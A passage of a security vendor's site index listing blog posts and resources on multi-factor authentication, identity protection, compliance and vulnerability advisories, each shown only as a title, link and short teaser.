has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event.... - [Reducing the Password Footprint in a Windows Environment](https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody... - [Reducing the Password Footprint in a Windows Environment](https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment-2/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody... - [Security Advisory: Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution (CVE-2019-19781)](https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known... - [Security Advisory: Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution (CVE-2019-19781)](https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781-2/): A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known... - [PAM is king, but who is protecting the king?](https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king/): — By Jonathan Nativ, Sales Director, APAC, Silverfort — In the game of chess, the king is the most important... - [Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm](https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm/): By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating... - [Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm](https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm-2/): By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating... - [Blocking Office365 Attacks (CVE-2017-11774) with MFA](https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa/): US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This... - [Blocking Office365 Attacks (CVE-2017-11774) with MFA](https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa-2/): US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This... - [Zero-Touch Secure Authentication for ‘Lift-and-Shift’ Cloud Migrations](https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations/): With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is... - [Zero-Touch Secure Authentication for ‘Lift-and-Shift’ Cloud Migrations](https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations-2/): With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is... - [How Silverfort Overcomes the New Lock Screen Bypass Vulnerability (CVE-2019-9510)](https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability/): Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows... - [How Silverfort Overcomes the New Lock Screen Bypass Vulnerability (CVE-2019-9510)](https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability-2/): Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows... - [The ‘BlueKeep’ Vulnerability: Keeping Your Systems Secure](https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure/): By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep... - [Silverfort Named a Gartner Cool Vendor in Identity and Access Management](https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor/): By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management... - [Silverfort Named a Gartner Cool Vendor in Identity and Access Management](https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor-2/): By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management... - [The ‘BlueKeep’ Vulnerability: Keeping Your Systems Secure](https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure-2/): By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep... - [Passwords: Can’t Rely On Them, Can’t Live Without Them...](https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them/): By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day – a good opportunity to discuss our... - [3 Ways Agentless MFA Successfully Tackles PCI DSS 8.3.1 Challenges](https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges/): One of the most common questions we get from our customers, is regarding requirement 8. 3. 1 of PCI DSSv3.... - [3 Ways Agentless MFA Successfully Tackles PCI DSS 8.3.1 Challenges](https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges-2/): One of the most common questions we get from our customers, is regarding requirement 8. 3. 1 of PCI DSSv3.... - [Simplify and Strengthen Authentication to CyberArk with Silverfort’s Agentless MFA](https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa/): We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our... - [Simplify and Strengthen Authentication to CyberArk with Silverfort’s Agentless MFA](https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa-2/): We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our... - [Passwords: Can’t Rely On Them, Can’t Live Without Them...](https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them-2/): By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day – a good opportunity to discuss our... - [How to Stop Iranian ‘SamSam’ Hackers from Taking your Network for Ransom](https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom/): SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across... - [PAM is king, but who is protecting the king?](https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king-2/): — By Jonathan Nativ, Sales Director, APAC, Silverfort — In the game of chess, the king is the most important... - [Rethinking MFA](https://www.silverfort.com/blog/rethinking-mfa/): We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality... - [How to Stop Iranian ‘SamSam’ Hackers from Taking your Network for Ransom](https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom-2/): SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across... - [Rethinking MFA](https://www.silverfort.com/blog/rethinking-mfa-2/): We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality... --- ## Resources - [Beyond the Perimeter: Modernizing Active Directory Protection Against Lateral Movement and Privileged Access Abuse](https://www.silverfort.com/resources/beyond-the-perimeter-modernizing-active-directory-protection-against-lateral-movement-and-privileged-access-abuse/): Identity is the new perimeter – and attackers know it. Breaches don’t end with the first compromise. Adversaries move laterally... - [Accelerating Passkey Adoption with Microsoft, Yubico & Silverfort](https://www.silverfort.com/resources/accelerating-passkey-adoption-with-microsoft-yubico-silverfort/): Strengthen your cyber defences with FIDO2 and passkeys Adopting phishing-resistant authentication methods with FIDO2 and passkeys is essential to safeguarding... - [How a leading US healthcare organization secured privileged access to ensure HIPAA compliance](https://resources.silverfort.com/case-study-leading-us-healthcare-organization-secured-privileged-access-to-ensure-hipaa-compliance/case-study-home#new_tab) - [SWIFT Customer SecurityControls Framework (CSCF) v2025](https://www.silverfort.com/resources/swift-customer-securitycontrols-framework-cscf-v2025/): Complying with SWIFT’s updated Customer Security Controls Framework (CSCF) is no small feat—especially when legacy systems and identity gaps get... - [Identity Security at a Crossroads: Balancing Stability, Agility, and Security](https://www.silverfort.com/resources/identity-security-at-a-crossroads-esg-research/): Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and... - [Closing identity security gaps: How Ping Identity and Silverfort protect every access point](https://www.silverfort.com/resources/closing-identity-security-gaps-how-ping-identity-and-silverfort-protect-every-access-point/): Scroll down to watch the webinar, or head over to YouTube. - [How IRCEM strengthened identity security posture to meet compliance requirements and secure privileged accounts](https://resources.silverfort.com/case-study-how-ircem-strengthened-identity-security-posture/home#new_tab) - [Cloud Non-Human Identity (NHI) Security](https://www.silverfort.com/resources/cloud-non-human-identity-nhi-security/): Get control of cloud NHIs before they become a problem Non-human identities are powering your cloud, but who’s managing them?... - [Silverfort and Netskope’s risk intelligence integration](https://www.silverfort.com/resources/silverfort-and-netskopes-risk-intelligence-integration/): Silverfort and Netskope have integrated to help organizations enforce smarter, risk-based access decisions across cloud and hybrid environments. The integration... - [The Identity Security Buyer’s Guide and RFP Checklist](https://www.silverfort.com/resources/rfp-checklist/): No email address required! Most organizations operate with a hybrid, fragmented IAM infrastructure – making it a complex task for... - [Silverfort & CrowdStrike SIEM for risk and incident monitoring](https://www.silverfort.com/resources/silverfort-crowdstrike-siem-for-risk-and-incident-monitoring/): Streamline identity threat detection across your entire security stack Traditional IAM tools leave gaps. This solution brief shows how Silverfort... - [Silverfort & CrowdStrike Falcon EDR](https://www.silverfort.com/resources/silverfort-crowdstrike-falcon-edr/): Extend detection and response from endpoints to identity This solution brief reveals how Silverfort and CrowdStrike Falcon Insight work together... - [Enhancing security at Pembroke College, Cambridge: Strengthening MFA and identity security with Silverfort](https://resources.silverfort.com/case-study-pembroke-strengthens-mfa-and-identity-security-with-silverfort#new_tab) - [Identity-first incident response with Silverfort](https://www.silverfort.com/resources/identity-first-incident-response-with-silverfort/): Compromised identities are the entry point for nearly every cyberattack—and time is your most precious asset when responding. Silverfort’s Identity-First... - [Unsichtbare Identitäten absichern: Best Practices für den Schutz von Service Accounts mit Silverfort](https://www.silverfort.com/landing-page/webinar/unsichtbare-identitaten-absichern-dach-webcast-german-july-2025/) - [Securing the Invisible Workforce: Best Practices for Service Account Protection with Silverfort](https://www.silverfort.com/landing-page/webinar/securing-the-invisible-workforce-webcast-english-july-2025/) - [Silverfort and Ping Identity Integration](https://www.silverfort.com/resources/silverfort-and-ping-identity-integration/): What if PingID could protect every corner of your environment—from SaaS apps to the most legacy on-prem servers? Now it... - [Accélérez votre mise en conformité NIS2 avec Silverfort](https://www.silverfort.com/resources/accelerez-votre-mise-en-conformite-nis2-avec-silverfort/): Selon certaines estimations, plus de 15 000 organisations seront concernées par la transposition française de NIS 2. Les “entités essentielles”... - [ゼロトラスト時代のアイデンティティ保護入門 〜Silverfortの全体像〜](https://www.silverfort.com/resources/introduction-to-identity-protection-in-the-zero-trust-era-japanese/): ゼロトラストの本質とは何か? そして、なぜ今「アイデンティティ」が最重要なのか? 本セミナーでは、Silverfortの全体像を通じて、現代のサイバーセキュリティ戦略における課題とその解決策をわかりやすくご紹介します。 目次(Agenda) - [Silverfort & Cortex XSOAR](https://www.silverfort.com/resources/silverfort-cortex-xsoar/): Real-time identity threat response, now fully automated Traditional IAM tools weren’t built to detect identity threats like lateral movement or... - [Silverfort & Cortex XDR](https://www.silverfort.com/resources/silverfort-cortex-xdr/): Unified endpoint + identity defense to stop modern attacks Endpoints and identities are often exploited together, but they’re still too... - [Comply with Zero Trust Maturity Model (ZTMM) requirements with Silverfort ](https://www.silverfort.com/resources/comply-with-zero-trust-maturity-model-ztmm-requirements-with-silverfort/): Developed by the CISA to guide U. S. federal agencies and adopted widely across critical industries like finance, energy, and... - [Solving key identity security challenges in SMBs with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-smbs-with-silverfort/): Big identity challenges, SMB-ready solutions Today’s small and medium-sized businesses (SMBs) face enterprise-level cyber threats—with a fraction of the resources.... - [Silverfort risk and incident notifications for Slack](https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-slack/): Stay ahead of identity threats with real-time Slack alerts Security teams can’t afford to miss a beat. With Silverfort’s Risk... - [Silverfort risk and incident notifications for Microsoft Teams](https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-microsoft-teams/): Supercharge Microsoft Teams with Silverfort risk alerts Want to turn Microsoft Teams into a security command center? With Silverfort’s Risk... - [Silverfort AI Agent Security](https://www.silverfort.com/resources/silverfort-ai-agent-security/): Confidently secure the next wave of AI innovation with Silverfort's AI Agent Security. - [Identity security in retail: How to prevent ransomware and thwart lateral identity attacks](https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges-2/): In the rapidly evolving threat landscape, retail companies have emerged as prime targets for identity threats, highlighting a concerning trend... - [Comply with the Security of Critical Infrastructure (SOCI) Act Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-the-security-of-critical-infrastructure-soci-act-requirements-with-silverfort/): Australia’s Security of Critical Infrastructure (SOCI) Act has transformed the regulatory landscape for operators of essential services. With expanded coverage... - [Silverfort Authenticator for Microsoft Teams](https://www.silverfort.com/resources/silverfort-authenticator-for-microsoft-teams/): Introducing Silverfort Authenticator for Microsoft Teams, a seamless way to extend secure authentication flows into the collaboration tool your teams... - [Silverfort and OneSpan FIDO2 Integration](https://www.silverfort.com/resources/silverfort-and-onespan-fido2-integration/): Looking to eliminate identity threats across your entire infrastructure — even the resources traditional MFA can’t reach? Silverfort and OneSpan... - [Bridging on-prem authentication with CyberArk Identity](https://www.silverfort.com/resources/silverfort-cyberark-joint-solution-brief/): Seamlessly extend CyberArk Identity to on-prem resources At Silverfort, we enable organizations to bring modern identity security to legacy environments.... - [An Identity Security Playbook: The What and The Why](https://www.silverfort.com/resources/an-identity-security-playbook-the-what-and-the-why/): Every security program needs a floor to stand on and a ceiling to grow into. In identity security, that floor... - [Shining a light on the hidden risks of non-human identities](https://www.silverfort.com/resources/shining-a-light-on-the-hidden-risks-of-non-human-identities/): Non-human identities (NHIs) – like service accounts, API keys, certificates, tokens, automation scripts, and cloud roles – now outnumber human... - [Solving key identity security challenges in state and local government with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-state-and-local-government-with-silverfort/): In 2024, 34% of U. S. state and local government organizations reported being hit by ransomware attacks, with the average... - [Solving key identity security challenges in finance with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-finance-with-silverfort/): Financial services remains a top target for ransomware and credential-based attacks, with a sharp increase of 61% year-over-year in Q1... - [Insecurity in the shadows: New data on the hidden risks of non-human identities](https://www.silverfort.com/landing-page/campaign/insecurity-in-the-shadows-report-download/) - [Winning the Privileged Access Battle: From Firefighting to Field Control](https://www.silverfort.com/resources/winning-the-privileged-access-battle-from-firefighting-to-field-control/): Identity security has a privileged access problem. Faced with massive complexity in securing your most important infrastructure, current approaches to... - [Schutz sensibler Konten ohne Umwege - Privileged Access neu gedacht](https://www.silverfort.com/resources/schutz-sensibler-konten-ohne-umwege-privileged-access-neu-gedacht/): Administratorkonten sind ein Hauptziel für Angreifer. Wird eines kompromittiert, droht unbemerkter Zugriff auf das gesamte Netzwerk – mit gravierenden Folgen.... - [Get ahead of HIPAA’s new identity requirements](https://www.silverfort.com/resources/get-ahead-of-hipaas-new-identity-requirements/): Download the Free HIPAA Identity Compliance Cheat Sheet Cyberattacks targeting healthcare are surging—and outdated HIPAA rules can’t keep up. Proposed... - [Bridging on-prem authentication with Keyless Security](https://www.silverfort.com/resources/bridging-on-prem-authentication-with-keyless-security/): Explore how Silverfort’s Keyless bridge extends biometric, phishing-resistant MFA across your hybrid infrastructure—from cloud to legacy on-prem systems. This one-pager... - [Microsoft & Silverfort Webinar: Meilleures pratiques et challenges du Tiering AD](https://www.silverfort.com/resources/microsoft-silverfort-webinar-meilleures-pratiques-et-challenges-du-tiering-ad/): Alors que la surface d’attaque des identités continue d’évoluer avec de nouvelles méthodes pour compromettre les organisations, le besoin de... - [Sichere Identitäten, weniger Risiko – So stoppen Sie Ransomware effektiv](https://www.silverfort.com/resources/sichere-identitaten-weniger-risiko-so-stoppen-sie-ransomware-effektiv/): Die Cybersicherheitslandschaft verändert sich rasant, und Identitätssicherheit spielt eine entscheidende Rolle im Schutz vor modernen Bedrohungen. In hybriden Unternehmensumgebungen ist... - [Cyber Assessment Framework (CAF) Compliance with Silverfort](https://www.silverfort.com/resources/cyber-assessment-framework-caf-compliance-with-silverfort/): As identity-based threats rise across critical infrastructure sectors, compliance with the UK’s Cyber Assessment Framework (CAF) is more vital—and complex—than... - [Uncovering and Addressing the Blind Spots in Privileged Access Management](https://www.silverfort.com/resources/uncovering-and-addressing-the-blind-spots-in-privileged-access-management/): Many organizations depend on Privileged Access Management (PAM) to secure administrator accounts — but relying on PAM alone can leave... - [Qualify for cyber insurance with fast and effective AD security](https://www.silverfort.com/resources/qualify-for-cyber-insurance-with-fast-and-effective-ad-security/): As cyber insurance requirements tighten, organizations are under pressure to demonstrate robust identity security—particularly within Active Directory (AD) environments. In... - [Case Study: Trinity College Cambridge strengthens MFA and service account protection with Silverfort](https://www.silverfort.com/resources/case-study-trinity-college-cambridge-strengthens-mfa-and-service-account-protection-with-silverfort/): Trinity College Cambridge faced a critical challenge: securing privileged and service accounts in their on-prem Active Directory. While their cloud-based... - [HIPAA Compliance 2.0: Is Your Identity Security Strategy Ready?](https://www.silverfort.com/resources/hipaa-compliance-2-0-is-your-identity-security-strategy-ready/): The newly proposed HIPAA security updates are being reviewed now, and they will demand more than just “check-the-box” compliance. Identity... - [Securing privileged access—from blind spots to resilience ](https://www.silverfort.com/resources/securing-privileged-access-from-blind-spots-to-resilience/): Securing privileged users in Active Directory is more critical than ever—but relying solely on Privileged Access Management (PAM) solutions leaves... - [Securing the Identity Attack Surface: A deep dive into identity security by Francis Odum.](https://www.silverfort.com/resources/francis-odums-securing-the-identity-attack-surface-report/): Learn why leading cybersecurity research and software analyst Francis Odum says that Silverfort is the “furthest along” in delivering a... - [Unveiling NTLMv1 Vulnerabilities: Risks and Mitigation Strategies in Active Directory Environments](https://www.silverfort.com/landing-page/on-demand-webinar/unveiling-ntlmv1-vulnerabilities-risks-and-mitigation-strategies-in-active-directory-environments/): Despite Microsoft’s announcement of the deprecation of NTLMv1 due to its inherent security weaknesses, recent findings reveal that many organizations... - [Identity Security Posture Management (ISPM) with Silverfort](https://www.silverfort.com/resources/identity-security-posture-management-with-silverfort/): Strengthen Your Identity Security Posture In today’s complex hybrid environments, misconfigurations and legacy systems can leave organizations vulnerable to identity-based... - [Non-Human Identity (NHI) Security with Silverfort](https://www.silverfort.com/resources/non-human-identity-nhi-security-with-silverfort/): Secure Your Non-Human Identities with Silverfort Non-human identities (NHIs), such as service accounts and automated processes, are integral to modern... - [The Identity Security Playbook](https://www.silverfort.com/resources/the-identity-security-playbook/): Your 5-Step Action Plan to a Sustainable Identity Security Strategy - [Identity Threat Detection & Response (ITDR) with Silverfort](https://www.silverfort.com/resources/identity-threat-detection-response-with-silverfort/): Protect Your Organization from Identity Threats Identity-based attacks are on the rise, targeting credentials, privileges, and access pathways. Silverfort’s Identity... - [Beyond the perimeter: Addressing blind spots in identity security for 2025 and beyond](https://www.silverfort.com/resources/beyond-the-perimeter-addressing-blind-spots-in-identity-security-for-2025-and-beyond/): As the security attack landscape continues to evolve, identity security has emerged as the next critical frontier. With an anticipated... - [US insurance provider enhances identity security posture with Authentication Firewall](https://www.silverfort.com/resources/us-insurance-provider-enhances-identity-security-posture-with-authentication-firewall/): When a trusted insurance provider sought to power up their identity security posture, they came to Silverfort. Led by their... - [Universal Multi-Factor Authentication (MFA) with Silverfort](https://www.silverfort.com/resources/universal-multi-factor-authentication-mfa-with-silverfort/): Enhance Your Security with Universal MFA In today’s evolving threat landscape, securing all access points is crucial. Silverfort’s Universal Multi-Factor... - [CISO Perspective: Why Great Companies with Great Solutions Still Get Breached](https://www.silverfort.com/resources/ciso-perspective-why-great-companies-with-great-solutions-still-get-breached/): In today’s constantly shifting threat landscape, even the most well-prepared companies with the latest and greatest solutions can still fall... - [Enhancing Microsoft’s ability to protect leaked credentials with Silverfort](https://www.silverfort.com/resources/enhancing-microsofts-ability-to-protect-leaked-credentials-with-silverfort/): Compromised credentials are still the #1 way attackers break in. What if you could block their use—on every system, in... - [Preventing Privilege Escalation: Effective PAS Practices for Today’s Threat Landscape](https://www.silverfort.com/resources/preventing-privilege-escalation-effective-pas-practices-for-todays-threat-landscape/): As privileged accounts continue to be one of the highest-risk targets for cyberattacks, managing them effectively is more critical than... - [Privileged Access Security (PAS)](https://www.silverfort.com/resources/privileged-access-security-pas/): Discover, classify, and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users. With Silverfort’s Privileged Access... - [Beyond the Endpoint: A Deep Dive into Using Identity as the Basis for Incident Response](https://www.silverfort.com/resources/beyond-the-endpoint-a-deep-dive-into-using-identity-as-the-basis-for-incident-response/): Three-quarters of organizations face faster-moving cyber threats than ever, making rapid detection and response essential. Traditionally, response focused on endpoints,... - [Comply with New York State Department of Health's Section 405.46 of Title 10 NYCRR](https://www.silverfort.com/resources/comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr/): The New York State Department of Health (DOH)’s Title 10 NYCRR Section 405. 46 requires healthcare facilities to implement strict... - [How to Comply with New York State Department of Health’s Section 405.46 of Title 10 NYCRR with Silverfort](https://www.silverfort.com/resources/how-to-comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr-with-silverfort/): The New York State Department of Health (DOH) established 10 NYCRR 405. 46 in 1999, initially to safeguard patient rights... - [How to comply with CMMC's Identity Security Requirements with Silverfort](https://www.silverfort.com/resources/how-to-comply-with-cmmcs-identity-security-requirements-with-silverfort/): The Cybersecurity Maturity Model Certification (CMMC) was established by the U. S. Department of Defense to bolster security in the... - [Silverfort and Token2 Integration](https://www.silverfort.com/resources/silverfort-and-token2-integration/): FIDO2 tokens are a powerful defense—but what if you could use them to protect everything? This PDF explores how Silverfort... - [Silverfort Identity Security for NIST SP 800-171](https://www.silverfort.com/resources/silverfort-identity-security-for-nist-sp-800-171/): NIST Special Publication 800-171, published in 2015 by the National Institute of Standards and Technology (NIST), offers a comprehensive framework... - [From Breach to Recovery: Designing an Identity-Focused Incident Response Playbook](https://www.silverfort.com/resources/from-breach-to-recovery-designing-an-identity-focused-incident-response-playbook/): Traditional incident response plans are no longer enough. Cybercriminals are relentlessly targeting identities, exploiting stolen credentials and weak access points... - [Silverfort Smart Policy for Service Accounts](https://www.silverfort.com/resources/silverfort-smart-policy-for-service-accounts/): Scale service account protection in bulk with behavior-based policies that never interfere with service operations. With Silverfort’s Smart Policy, customers... - [Identity Has Become the Prime Target of Threat Actors | Silverfort + AIG](https://www.silverfort.com/resources/identity-has-become-the-prime-target-of-threat-actors-silverfort-aig/): As the frequency and sophistication of ransomware attacks escalate, identity has emerged as the primary target for cybercriminals. With over... - [Silverfort's Okta Bridge](https://www.silverfort.com/resources/silverforts-okta-bridge/): Bring Okta’s web SSO flows to your on-prem world for real-time protection against identity-based attacks. - [Silverfort's PingFederate Bridge](https://www.silverfort.com/resources/silverforts-pingfederate-bridge/): Extend PingFederate web SSO flows to every corner of your environment - [Meeting the Identity Security Requirements of the CJIS Security Policy with Silverfort](https://www.silverfort.com/resources/meeting-the-identity-security-requirements-of-the-cjis-security-policy-with-silverfort/): CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is any information... - [Re-Evaluate Your MFA Protection](https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ppc/): MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources,... - [Overcoming the Security Blind Spots of Service Accounts](https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts-ppc/): Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders.... - [Solving the Top Five PAM Challenges of Identity Teams ](https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams-ppc/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Why Identity Security Is A Necessity](https://www.silverfort.com/resources/why-identity-security-is-a-necessity/): Identity security has become a top priority for all organizations. Traditional identity controls do not provide complete coverage, leaving critical... - [Safe and Impact-Free Usage of Silverfort on Your Domain Controllers](https://www.silverfort.com/resources/safe-and-impact-free-usage-of-silverfort-on-your-domain-controllers/): Ensuring your Active Directory Domain Controllers are secure and stable is more critical than ever. Silverfort understands the delicate balance... - [Data#3 and Silverfort: Implementing World-Leading Identity Protection with The Southport School](https://www.silverfort.com/resources/data3-and-silverfort-implementing-world-leading-identity-protection-with-the-southport-school/): Discover how Silverfort and Data#3, leading cloud solutions and ICT service providers in Australia, are working together to bring best-in-class... - [Why Silverfort](https://www.silverfort.com/resources/why-silverfort/): Traditional identity controls fall short of providing complete coverage, leaving critical resources exposed to malicious access. With Silverfort, organizations can... - [Silverfort for Microsoft Sentinel and Security Copilot](https://www.silverfort.com/resources/silverfort-for-microsoft-sentinel-and-security-copilot/): Traditional IAM solutions often lack the depth needed to detect ongoing malicious activity, particularly identity-based attacks. Silverfort bridges this gap... - [Silverfort Identity Security for the NIST Cybersecurity Framework 2.0](https://www.silverfort.com/resources/silverfort-identity-security-for-the-nist-cybersecurity-framework-2-0/): Align with NIST 2. 0 and secure every identity with confidence The NIST Cybersecurity Framework 2. 0 is here, and... - [Gain End-to-End Visibility Across Your Environment with Silverfort](https://www.silverfort.com/resources/gain-end-to-end-visibility-across-your-environment-with-silverfort/): Security starts with visibility. If you don’t have full visibility across your environments, you are essentially operating in the dark.... - [Webinar-Top 5 Evaluation Criteria for ITDR Solutions](https://www.silverfort.com/resources/webinar-top-5-evaluation-criteria-for-itdr-solutions/): In today’s digital landscape, identity threats are more prevalent than ever. Protecting your digital identity is crucial as lateral movement... - [London Borough of Waltham Forest and Silverfort: A Case Study](https://www.silverfort.com/resources/london-borough-of-waltham-forest-and-silverfort-a-case-study/): Following ransomware attacks targeting a number of schools in the borough, the London Borough of Waltham Forest needed to strengthen... - [Identity Threat Detection and Response (ITDR): Protecting the Exposed Attack Surface](https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface-thn-nf/): Identity threats that utilize compromised credentials to for malicious access to targeted resource have become the chief concern for organizations’... - [Silverfort's Authentication Firewall](https://www.silverfort.com/resources/silverforts-authentication-firewall/): Strengthen Access Control with Silverfort’s Authentication Firewall In today’s dynamic threat landscape, enforcing granular access control is essential to protect... - [Leading Gaming Company Extends MFA Protection to Core Legacy Applications and Bridges On-Prem Resources to Entra ID with Silverfort](https://www.silverfort.com/resources/leading-gaming-company-extends-mfa-protection-to-core-legacy-applications-and-bridges-on-prem-resources-to-entra-id-with-silverfort/): A leading gaming company that develops immersive free-to-play social and mobile games sought to implement MFA protection across all users... - [Silverfort and Thales FIDO2 Integration](https://www.silverfort.com/resources/silverfort-and-thales-fido2-integration/): FIDO2 hardware-backed authentication is the gold standard. But what if you could apply it to every system—no matter how old... - [Shannon Medical Center and Silverfort: A Case Study](https://www.silverfort.com/resources/shannon-medical-center-and-silverfort-a-case-study/): As a prominent healthcare provider, Shannon Medical Center needed to increase its overall security posture. This meant applying MFA protection... - [Identity Protection for Financial Services: Key Insights from the State of the Identity Attack Surface Report](https://www.silverfort.com/resources/identity-protection-for-financial-services-key-insights-from-the-state-of-the-identity-attack-surface/): Cyberattacks on financial institutions are highly frequent due to the large amount of sensitive financial information and assets they hold.... - [The Role Identity Plays in Nearly Every Attack—Including Ransomware](https://www.silverfort.com/resources/the-role-identity-plays-in-nearly-every-attack-including-ransomware/): Watch this short video about Unified Identity Protection with Silverfort. - [Top 5 Identity Protection Challenges for Manufacturing Organizations](https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing/): It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft... - [Womble Bond Dickinson LLP and Silverfort: A Case Study](https://www.silverfort.com/resources/womble-bond-dickinson-and-silverfort-case-study/): Womble Bond Dickinson (UK) LLP is a transatlantic law firm that provides the breadth of legal experience and services to... - [West Valley School District and Silverfort: A Case Study](https://www.silverfort.com/resources/west-valley-school-district-silverfort-a-case-study/): West Valley School District Extends MFA Protection to All Faculty Users While Securing Service Accounts West Valley School District 208... - [Leading Telecom Provider and Silverfort: A Case Study](https://www.silverfort.com/resources/leading-telecom-provider-and-silverfort-a-case-study/): Due to the many identity protection challenges and the awareness of their evolving threat landscape, a leading telecom provider security... - [Advantages and Limitations of MFA: Exploring Common Bypass Techniques and Security Counter Measures](https://www.silverfort.com/resources/advantages-and-limitations-of-mfa-exploring-common-bypass-techniques-and-security-counter-measures/): One of the most common identity security controls recommended is to implement MFA for at least those with access to... - [360 MFA protection for OT environments](https://www.silverfort.com/resources/360-mfa-protection-for-ot-environments/): Legacy systems, air-gapped networks, and MFA requirements don’t have to clash. This solution brief introduces how Silverfort delivers true 360°... - [Solving Education's Key Identity Protection Challenges with Silverfort](https://www.silverfort.com/resources/solving-educations-key-identity-protection-challenges/): The education sector is an increasingly lucrative target for ransomware and data breaches. Attack volume increased by 179% in 2023,... - [5 Ways to Step Up Your AD Hygiene with Silverfort](https://www.silverfort.com/resources/five-ways-to-step-up-your-ad-hygiene-with-silverfort/): Keep your Active Directory clean, secure, and attack-resilient Your Active Directory (AD) is a goldmine for attackers, and one weak... - [Today's Top 4 